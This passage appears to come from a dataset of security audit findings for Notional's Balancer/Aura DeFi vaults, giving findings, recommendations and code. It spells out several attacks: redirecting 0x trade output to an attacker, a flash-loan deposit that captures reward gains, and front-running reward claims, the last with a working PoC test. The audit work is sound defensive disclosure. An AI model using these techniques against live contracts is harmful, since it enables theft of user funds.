its underlying assets (WETH and stETH)\\nThe primary and secondary assets of the vault are WETH and stETH respectively. The secondary asset (stETH) will be traded for the primary asset (WETH) in one of the supported DEXes. In the end, only the primary assets (WETH) should remain within the vault.\\nThe WETH within the vault will be sent to Notional, and Notional will mint the asset tokens (cEther) for the vault in return.\\nAfter completing the emergency vault settlement process, the vault will gain asset tokens (cEther) after settling/selling its excess BPT tokens.\\nIssue Description\\nThe caller of the `settleVaultEmergency` function can specify the trade parameters to sell the secondary tokens (stETH) for primary tokens (WETH) in any of the supported 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x) in Step 5 of the above emergency vault settlement process.\\nAfter analyzing the adaptors of 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x), it was observed that Curve, Balancer V2, Uniswap V2, and Uniswap V3 are designed in a way that the purchased tokens can only be returned to the vault.\\nTake the Uniswap V2 adaptor as an example. When the vault triggers the trade execution, it will always pass its own address `address(this)` `to` the `from` parameter of the `getExecutionData` function. The value of `from` parameter will be passed `to` the `to` parameter of Uniswap's `swapExactTokensForTokens` function, which indicates the recipient of the output/purchased tokens. Therefore, it is impossible for the caller `to` specify the recipient of the output tokens `to` another address. 
This is also the same for Curve, Balancer V2, and Uniswap V3.\\n```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n\\nHowever, this is not implemented for the 0x adaptor (ZeroExAdapter). The `from` of the `getExecutionData` is completely ignored, and the caller has the full flexibility of crafting an order that benefits the caller.\\n```\\nFile: ZeroExAdapter.sol\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n}\\n```\\n\\nA number of features are supported by 0x. The full list of the supported features can be found here. Specifically, the following are the functions of attacker interest because it allows the attacker to configure the `recipient` parameter so that the bought tokens will be redirected to the attacker's wallet instead of the vault.\\nLiquidityProviderFeature - sellToLiquidityProvider\\n```\\n /// @dev Sells `sellAmount` of `inputToken` to the liquidity provider\\n /// at the given `provider` address.\\n /// @param inputToken The token being sold.\\n /// @param outputToken The token being bought.\\n /// @param provider The address of the on-chain liquidity provider\\n /// to trade with.\\n /// @param recipient The recipient of the bought tokens. 
If equal to\\n /// address(0), `msg.sender` is assumed to be the recipient.\\n /// @param sellAmount The amount of `inputToken` to sell.\\n /// @param minBuyAmount The minimum acceptable amount of `outputToken` to\\n /// buy. Reverts if this amount is not satisfied.\\n /// @param auxiliaryData Auxiliary data supplied to the `provider` contract.\\n /// @return boughtAmount The amount of `outputToken` bought.\\n function sellToLiquidityProvider(\\n IERC20TokenV06 inputToken,\\n IERC20TokenV06 outputToken,\\n ILiquidityProvider provider,\\n address recipient,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n bytes calldata auxiliaryData\\n )\\n```\\n\\nUniswapV3Feature - sellTokenForTokenToUniswapV3\\n```\\n /// @dev Sell a token for another token directly against uniswap v3.\\n /// @param encodedPath Uniswap-encoded path.\\n /// @param sellAmount amount of the first token in the path to sell.\\n /// @param minBuyAmount Minimum amount of the last token in the path to buy.\\n /// @param recipient The recipient of the bought tokens. Can be zero for sender.\\n /// @return buyAmount Amount of the last token in the path bought.\\n function sellTokenForTokenToUniswapV3(\\n bytes memory encodedPath,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n address recipient\\n )\\n```\\n\\nThe malicious user could perform the following actions to steal the assets:\\nAllow malicious users to specify the recipient of the output/purchased tokens to be themselves instead of the vault. This will cause the output/purchased tokens of the trade to be redirected to the malicious users instead of the vault\\nSpecify the `minBuyAmount` parameter of the order to `1 WEI` so that he only needs to provide `1 WEI` to fill the order to obtain all the secondary token (stETH) that need to be sold. 
This is allowed as there is no slippage control within 0x adaptor (Refer to my ""No Slippage Control If The Trade Executes Via 0x DEX During Emergency Vault Settlement"" issue write-up)","It is recommended to implement validation against the submitted 0x trade order to ensure that the recipient of the bought tokens is set to the vault when using the 0x DEX. Consider implementing the following validation checks.\\n```\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n \\n _validateExchangeData(from, trade);\\n \\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n \\n function _validateExchangeData(address from, Trade calldata trade) internal pure {\\n bytes calldata _data = trade.exchangeData;\\n\\n address inputToken;\\n address outputToken;\\n address recipient;\\n uint256 inputTokenAmount;\\n uint256 minOutputTokenAmount;\\n\\n require(_data.length >= 4, ""Invalid calldata"");\\n bytes4 selector;\\n assembly {\\n selector := and(\\n // Read the first 4 bytes of the _data array from calldata.\\n calldataload(add(36, calldataload(164))), // 164 = 5 * 32 + 4\\n 0xffffffff00000000000000000000000000000000000000000000000000000000\\n )\\n }\\n \\n if (selector == 0xf7fcd384) {\\n \\n (\\n inputToken, \\n outputToken, \\n , \\n recipient, \\n inputTokenAmount, \\n minOutputTokenAmount\\n ) = abi.decode(_data[4:], (address, address, address, address, uint256, uint256));\\n require(recipient == from, ""Mismatched recipient"");\\n } else if (selector == 
0x6af479b2) {\\n // sellTokenForTokenToUniswapV3()\\n bytes memory encodedPath;\\n // prettier-ignore\\n (\\n encodedPath,\\n inputTokenAmount, \\n minOutputTokenAmount, \\n recipient\\n ) = abi.decode(_data[4:], (bytes, uint256, uint256, address));\\n require(recipient == from, ""Mismatched recipient"");\\n }\\n }\\n}\\n```\\n","Attackers can craft a 0x order that redirects the assets to their wallet, leading to loss of assets for the vaults and their users.","```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n" +Settlement slippage is not implemented correctly which may lead to some vaults being impossible to settle,high,"The contract is supposed to implement a different max slippage value depending on the settlement type, but these values have no impact because they are never actually applied. Instead, regardless of settlement type or function inputs, max slippage will always be limited to the value of balancerPoolSlippageLimitPercent. This can be problematic because the default value allows only 1% slippage. If settlement slippage goes outside of 1% then settlement of any kind will become impossible.\\nBoosted3TokenAuraHelper.sol#L95-L99\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n\\nBoosted3TokenAuraHelper#_executeSettlement first sets params.minPrimary overwriting any value from function input. 
Next it adjusts minPrimary by balancerPoolSlippageLimitPercent, which is a constant set at pool creation; however it doesn't ever adjust it by Params.DynamicTradeParams.oracleSlippagePercent. This means that the max possible slippage regardless of settlement type is limited to the slippage allowed by balancerPoolSlippageLimitPercent. If the max slippage ever goes outside of this range, then settlement of any kind will become impossible.","Params.DynamicTradeParams.oracleSlippagePercent is validated in every scenario before Boosted3TokenAuraHelper#_executeSettlement is called, so we can apply these values directly when calculating minPrimary:\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n+ DynamicTradeParams memory callbackData = abi.decode(\\n+ params.secondaryTradeParams, (DynamicTradeParams)\\n+ );\\n\\n- params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n+ params.minPrimary = params.minPrimary * \\n+ (strategyContext.vaultSettings.balancerPoolSlippageLimitPercent - callbackData.oracleSlippagePercent) / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n",Settlement may become impossible,"```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n" +Gain From Balancer Vaults Can Be Stolen,medium,"The BPT gain (rewards) of the vault can be stolen by an attacker.\\nAt T0 (Time 0), assume that the state of the WETH/wstETH MetaPool Vault is as follows:\\ntotalBPTHeld = 1000 BPT\\ntotalStrategyTokenGlobal = 1000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens, and she is the only person invested in the vault at this point in time\\nAssume that if the `reinvestReward` 
is called, it will reinvest 1000 BPT back into the vault. Thus, if the `reinvestReward` is called, the `totalBPTHeld` of the vault will become 2000 BPT.\\nFollowing is the description of the attack:\\nThe attacker notices that if the `reinvestReward` is called, it will result in a large increase in the total BPT held by the vault\\nThe attacker flash-loans a large amount of WETH (e.g. 1,000,000) from a lending protocol (e.g. dydx)\\nEnter the vault by depositing 1,000,000 WETH by calling the `VaultAccountAction.enterVault` function. However, do not borrow any cash from Notional by setting the `fCash` parameter of the `VaultAccountAction.enterVault` function to `0`.\\nThere is no need to borrow from Notional as the attacker could already flash-loan a large amount of WETH with a non-existent fee rate (e.g. 1 Wei in dydx). Most importantly, the vault fee will only be charged if the user borrows from Notional. The fee is assessed within the `VaultAccount._borrowIntoVault`, which will be skipped if users are not borrowing. By not borrowing from Notional, the attacker does not need to pay any fee when entering the vault and this will make the attacker more profitable.\\nThe vault will deposit 1,000,000 WETH to the Balancer pool and receive a large amount of BPT in return. For simplicity's sake, assume that the vault receives 1,000,000 BPT in return.\\nBased on the `StrategyUtils._convertBPTClaimToStrategyTokens` function, the attacker will receive 1,000,000 strategy tokens. The state of the vault will be as follows after the attacker deposits:\\ntotalBPTHeld = 1,001,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker calls the `reinvestReward` function, and reward tokens will be reinvested. Assume that the vault receives 1000 BPT. 
The state of the vault will be as follows after the reinvest:\\ntotalBPTHeld = 1,002,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim ~1.0009 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker exits the vault with all his strategy tokens by calling the `VaultAccountAction.exitVault` function. This will cause the vault to redeem all the 1,000,000 Strategy Tokens owned by the attacker. Based on the `StrategyUtils._convertStrategyTokensToBPTClaim` function, the attacker will receive 1,000,999 BPT in return. Note that there is no fee for exiting the vault and there is no need for repaying the debt as the attacker did not borrow any assets from Notional at the beginning.\\n```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n\\nProceed to repay the flash-loan at the end of the transaction. All the above steps are executed within a single transaction. Within a single transaction/block, the attacker is able to increase his holding of 1,000,000 BPT to 1,000,999 BPT after calling the `reinvestReward` function, and effectively gain around 999 BPT.\\nAlice who had been invested in the vault since the vault was first launched should be entitled to the majority of the rewards (Close to 1000 BPT). 
However, the attacker who came in right before the `reinvestReward` function was triggered managed to obtain almost all of her allocated shares of rewards (999 BPT) and left only 1 BPT for Alice.\\nNote: A flash-loan is not required if the attacker has sufficient liquidity to carry out the attack or the vault does not have much liquidity.\\nFollowing are the two functions for converting between BPT and Strategy Token for reference.\\n```\\n/// @notice Converts BPT to strategy tokens\\nfunction _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n}\\n```\\n\\n```\\n/// @notice Converts strategy tokens to BPT\\nfunction _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n}\\n```\\n","Following are the list of root causes of the issue and some recommendation to mitigate them.\\n`reinvestReward` function is permissionless and can be called by anyone. 
It is recommended to implement access control to ensure that this function can only be triggered by Notional. Do note that even if the attacker cannot trigger the `reinvestReward` function, it is still possible for the attacker to front-run and back-run the `reinvestReward` transaction to carry out the attack if they see this transaction in the public mempool. Thus, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot sandwich the transaction.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. If the user entered the vault in this block, he/she could only exit at the next block.\\nThere is no snapshotting to keep track of the deposit to ensure that BPT gain/rewards distributions are weighted according to deposit duration. Thus, a whale could deposit right before the `reinvestReward` function is triggered and exit the vault afterward and reap most of the gains. Consider implementing snapshotting within the vault.
This issue affects all balancer-related vaults that contain the permissionless `reinvestReward` function.,"```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n" +Malicious Users Can Deny Notional Treasury From Receiving Fee,medium,"Malicious users can deny Notional Treasury from receiving fees when rewards are reinvested.\\nThe `claimRewardTokens` function will harvest the reward tokens from the Aura Pool, and the reward tokens will be transferred to the Balancer Vault. At lines 77-78, a portion of the reward tokens would be sent to the `FEE_RECEIVER`. After clarifying with the sponsor, it was understood that the `FEE_RECEIVER` would be set to Notional Treasury so that it would receive some of the accrued reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n\\nWithin the `claimRewardTokens` function, it will call the `AURA_REWARD_POOL.getReward` to harvest 
the reward tokens. Within the `claimRewardTokens` function, it also uses the pre-balance and post-balance of the reward tokens to check the actual amount of reward tokens that are transferred into the vault.\\nHowever, the issue is that anyone can claim reward tokens from Aura Pool on behalf of any address. Following is the implementation of the `getReward` function taken from Aura's BaseRewardPool4626 contract called by the vault for reference.\\n```\\n/**\\n * @dev Gives a staker their rewards, with the option of claiming extra rewards\\n * @param _account Account for which to claim\\n * @param _claimExtras Get the child rewards too?\\n */\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n\\nmodifier updateReward(address account) {\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateTime = lastTimeRewardApplicable();\\n if (account != address(0)) {\\n rewards[account] = earned(account);\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n _;\\n}\\n\\nfunction earned(address account) public view returns (uint256) {\\n return\\n balanceOf(account)\\n .mul(rewardPerToken().sub(userRewardPerTokenPaid[account]))\\n .div(1e18)\\n .add(rewards[account]);\\n}\\n```\\n\\nAssume that a malicious user front runs a call to claim rewards tokens. When a keeper calls the `AURA_REWARD_POOL.getReward` to harvest the reward tokens, it will return no reward tokens, and therefore the difference between the pre-balance and post-balance of the reward tokens will amount to zero. 
Therefore, no reward tokens will be sent to the `FEE_RECEIVER` (Notional Treasury) as a fee.\\nProof-of-Concept\\nThe `test_claim_rewards_success` test case shows that under normal circumstances, the Notional treasury will receive a portion of the accrued BAL and AURA as fees.\\nThe `test_claim_rewards_success_frontrun` test case shows that if the `getReward` is front-run by an attacker, the Notional treasury will receive nothing.\\nThe following is the test script and its result.\\n```\\nimport pytest\\nfrom brownie import ZERO_ADDRESS, Wei, accounts, interface\\nfrom tests.fixtures import *\\nfrom tests.balancer.helpers import enterMaturity, get_metastable_amounts\\nfrom scripts.common import get_univ3_single_data, get_univ3_batch_data, DEX_ID, TRADE_TYPE\\n\\nchain = Chain()\\n\\ndef test_claim_rewards_success(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[""baseStrategy""][""feeReceiver""]\\n feePercentage = vault.getStrategyContext()[""baseStrategy""][""vaultSettings""][""feePercentage""] / 1e2\\n assert env.tokens[""BAL""].balanceOf(vault.address) == 0\\n assert env.tokens[""AURA""].balanceOf(vault.address) == 0\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) == 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) == 0\\n\\n vault.claimRewardTokens({""from"": accounts[1]})\\n\\n # Test that the fee receiver received portion of the rewards as fee\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) > 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) > 0\\n\\ndef test_claim_rewards_success_frontrun(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n 
chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[""baseStrategy""][""feeReceiver""]\\n feePercentage = vault.getStrategyContext()[""baseStrategy""][""vaultSettings""][""feePercentage""] / 1e2\\n assert env.tokens[""BAL""].balanceOf(vault.address) == 0\\n assert env.tokens[""AURA""].balanceOf(vault.address) == 0\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) == 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) == 0\\n\\n auraPool = interface.IAuraRewardPool(vault.getStrategyContext()[""stakingContext""][""auraRewardPool""])\\n auraPool.getReward(vault.address, True, {""from"": accounts[5]}) # Attacker frontrun the getReward\\n vault.claimRewardTokens({""from"": accounts[1]})\\n\\n # Test that the fee receiver received nothing due the frontrunning\\n assert env.tokens[""BAL""].balanceOf(feeReceiver) == 0\\n assert env.tokens[""AURA""].balanceOf(feeReceiver) == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/rewards/test_rewards_stable_eth_steth.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 2 items \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/rewards/test_rewards_stable_eth_steth.py .. [100%]\\n\\n========================================================================================== 2 passed, 1 warning in 5.72s ===========================================================================================\\n```\\n",It is recommended not to use the pre-balance and post-balance of the reward tokens when claiming reward tokens. 
A more robust internal accounting scheme needs to be implemented to keep track of actual reward tokens received from the pool so that the appropriate amount of the accrued reward tokens can be sent to the Notional Treasury.\\nReference\\nA similar high-risk issue was found in the past audit report,Notional Treasury will not receive a portion of the accrued reward tokens as fees. Loss of assets for Notional protocol and its governance token holders.,"```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n" +Balancer Vault Will Receive Fewer Assets As The Current Design Does Not Serve The Interest Of Vault Shareholders,medium,"The current implementation of reinvesting reward function does not benefit the vault shareholders as the current design does not serve the vault shareholder's interest well. 
Thus, this will result in Balancer vaults receiving fewer assets.\\nThe `reinvestReward` function of the Balancer Vaults (MetaStable2TokenAuraVault and Boosted3TokenAuraVault) is permissionless and can be called by anyone. By calling `reinvestReward` function, the vault will trade the reward tokens received by the vault for tokens that are accepted by the balancer pool, and deposit them to the pool to obtain more BPT tokens for the vault shareholders. By continuously reinvesting the reward tokens into the pool, the vault shareholders will be able to lay claim to more BPT tokens per share over time.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n\\n```\\nFile: Boosted3TokenAuraHelper.sol\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external { \\n```\\n\\nThe caller of the `reinvestReward` function can specify the trading configuration such as the DEX (e.g. Uniswap, Curve) that the trade should be executed and the slippage (params.tradeParams.oracleSlippagePercent). Note that the slippage defined must be equal to or less than the `strategyContext.vaultSettings.maxRewardTradeSlippageLimitPercent` setting that is currently set to 5% within the test scripts.\\nNotional Vaults support trading in multiple DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x). Since `reinvestReward` function is callable by anyone, the liquidity provider of the supported DEX protocols will want the trade to be executed on the DEX pool that they invested on. This will allow them to earn an additional transaction fee from the trade. The amount of transaction fee earned will be significant if the volume is large when there are many vaults and reward tokens to be reinvested. In addition, the caller will set the slippage to the maximum configurable threshold (e.g. 
5% in this example) to maximize the profit. Therefore, this will end up having various liquidity providers front-running each other to ensure that their `reinvestReward` transaction gets executed in order to extract value.","It is recommended to implement access control on the `reinvestReward` function to ensure that this function can only be triggered by Notional who has the best interest of its vault users.\\nAlso, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot perform any kind of sandwich attack on the reinvest rewards transaction.","This does not serve the vault shareholder's interest well as the caller of the `reinvestReward` function will not be trading and reinvesting in an optimal way that maximizes the value of the shareholder's assets in the vaults. There is a misalignment in the objective between the vault shareholders and callers. Therefore, the vault and its users will end up on the losing end and receive fewer assets than they should.","```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n" +Existing Slippage Control Can Be Bypassed During Vault Settlement,medium,"The existing slippage control can be bypassed/disabled during vault settlement, thus allowing the trade to be executed without consideration of its slippage.\\nNote 1: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nNote 2: This issue affects the following three (3) processes. However, the root cause and the remediation action are the same for all. Therefore, only the PoC for the ""Emergency vault settlement"" process will be documented in this report, and the other two processes will be omitted for brevity. 
Refer to ""Appendix I - Normal and Post Maturity Vault Settlement"" for more details.\\nEmergency vault settlement\\nNormal vault settlement\\nPost-Maturity vault settlement.\\nNote 3: The issue affects all the supported DEXs (Curve, Balancer V2, Uniswap V2, Uniswap V3 and 0x) within Notional\\nThe `emergencySettlementSlippageLimitPercent` of the vault is set to 10% as per the environment file provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n ""postMaturitySettlementSlippageLimitPercent"": 10e6, # 10%\\n ""emergencySettlementSlippageLimitPercent"": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultEmergency` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function settleVaultEmergency(\\n MetaStable2TokenAuraStrategyContext calldata context, \\n uint256 maturity, \\n bytes calldata data\\n ) external {\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.emergencySettlementSlippageLimitPercent,\\n data\\n );\\n\\n uint256 bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n poolContext: context.poolContext.basePool, \\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.pool).totalSupply()\\n });\\n```\\n\\nThe `SettlementUtils._decodeParamsAndValidate` function will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) passed in by the caller does not exceed the designated threshold (10%). In Line 41-42, the transaction will revert if the `DynamicTradeParams.oracleSlippagePercent` exceeds the `slippageLimitPercent`. Note that `slippageLimitPercent` is equal to `emergencySettlementSlippageLimitPercent` which is `10%`.\\nThere is an edge case with the condition at Line 41. 
Consider the following cases:\\nIf `callbackData.oracleSlippagePercent` = 9% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nIf `callbackData.oracleSlippagePercent` = 11% and `slippageLimitPercent` = 10%, the condition will evaluate as `True` and transaction will revert because it exceeds the designated threshold.\\nIf `callbackData.oracleSlippagePercent` = 0% and `slippageLimitPercent` = 10%, the condition will evaluate as `False` and transaction will not revert\\nThe problem is that when `callbackData.oracleSlippagePercent` is `0%`, this effectively means that there is no slippage limit. This essentially exceeded the designated threshold (10%), and the transaction should revert instead, but it did not.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nWithin `executeTradeWithDynamicSlippage` function, it will calculate the `trade.limit` by calling the `PROXY.getLimitAmount`. 
